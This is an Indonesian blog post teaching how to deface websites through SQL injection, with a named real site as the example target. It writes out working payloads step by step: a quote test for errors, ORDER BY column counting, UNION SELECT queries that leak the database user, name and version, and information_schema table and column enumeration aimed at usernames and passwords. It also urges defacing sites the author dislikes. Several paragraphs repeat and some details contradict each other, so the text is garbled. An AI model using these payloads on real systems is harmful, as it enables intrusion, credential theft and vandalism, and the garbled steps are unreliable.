Hack, Hack bagi seseorang yang yang kurang paham kata tersebut adalah kata yang menyeramkan :p
pda kali ini saya akan memberitahukan Cara Mendeface Situs web
catatan :
digunakan untuk mendeface situs - situs tertentu seperti situs yang tidak baik ( kalo mampu :P)
berikut langkah - langkanya :
1.Cari target
pda kali ini saya akan memberitahukan Cara Mendeface Situs web
catatan :
digunakan untuk mendeface situs - situs tertentu seperti situs yang tidak baik ( kalo mampu :P)
berikut langkah - langkanya :
1.Cari target
ex : http://www.kaskus.us/shop.php?id=96
2.cari tau ada bugs atau nga
cara : tambahin ' di akhir uid http://www.kaskus.us/shop.php?id=96'kalo ada pesan erornya,berarti tuh ada bugsnya berati siap kita oprek.
3.hitung field di databasenya
cara : tambahin +order+by+nominal/*contoh :http://www.kaskus.us/shop.php?id=96+order+by+14/*
disini kita main tebak tebakan.Kira2 ada berapa field di databasenya. Kita isi ajanominalnya dari 1 sampai ada pesan erornya.pada contoh di atas jumlah kolomnya ada14,berarti pada nominal ke 14 pesan erornya tidak ada,and pada nominal 15 ada pesan erornya 4.
4.Sekarangh kita cari magic numbernya
cara : abis uid kita tambah +union+select+nominal jumlah kolomcontohhttp://www.kaskus.us/shop.php?id=989%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/*liat angka berapa yg nongol. dalam contoh ini yg keluar angka 65.
5.sekarang kita liat versinya
{ada yg bilang klo bagian ini ga penting banget}cara : maggic number yg keluar tadi kita ganti denganconcat_ws(user(),0x3a,database(),0x3a,version()).pada contoh diatas adalah angka 6 contoh
http://www.kaskus.us/shop.php?id=989 unionselect1,2,3,4,5,concat_ws(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12,13,14/*6.keluarin tablenyacara kita tambahkan +from+information_schema.tables/* setelah angka terakhir
contoh :
http://www.kaskus.us/shop.php?id=989%20union%20select%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tablesups
{ada yg bilang klo bagian ini ga penting banget}cara : maggic number yg keluar tadi kita ganti denganconcat_ws(user(),0x3a,database(),0x3a,version()).pada contoh diatas adalah angka 6 contoh
http://www.kaskus.us/shop.php?id=989 unionselect1,2,3,4,5,concat_ws(user(),0x3a,database(),0x3a,version()),7,8,9,10,11,12,13,14/*6.keluarin tablenyacara kita tambahkan +from+information_schema.tables/* setelah angka terakhir
contoh :
http://www.kaskus.us/shop.php?id=989%20union%20select%201,2,3,4,5,table_name,7,8,9,10,11,12,13,14+from+information_schema.tablesups
ga isa...akalin ah.gimana kalo ditambahin lagi menjadi
gunanya apa itu sih???? hehehe aku juga ga ngerti , pas saya coba ternyata gagal, saya konsultasi sama teman kata dia suruh nambah itu di belakanganya, walhasil bisa kalian liat hasilnya .
6.saatnya cari kolom
cara sama kaya cara diatas,cuman tabel ganti aja sama kolom .
6.saatnya cari kolom
cara sama kaya cara diatas,cuman tabel ganti aja sama kolom .
cari user name n pass nyanah buat yg satu ini aku belom pamah bener jadi ga berani aku tulis,soalnya aku juga masih mumet ,pernah nyoba,pernah sukses,pernah gagal.cuman buat kasus yg ini,contoh ini aku udah tau kelanjutanya,soalnya di bantu temen pas bagian ininya.
sekian yang dapat saya sampaikan semoga bermanfaat tambahan
download video yang terkait :
download di sini....
sekian yang dapat saya sampaikan semoga bermanfaat tambahan
download video yang terkait :
download di sini....
0 komentar:
Posting Komentar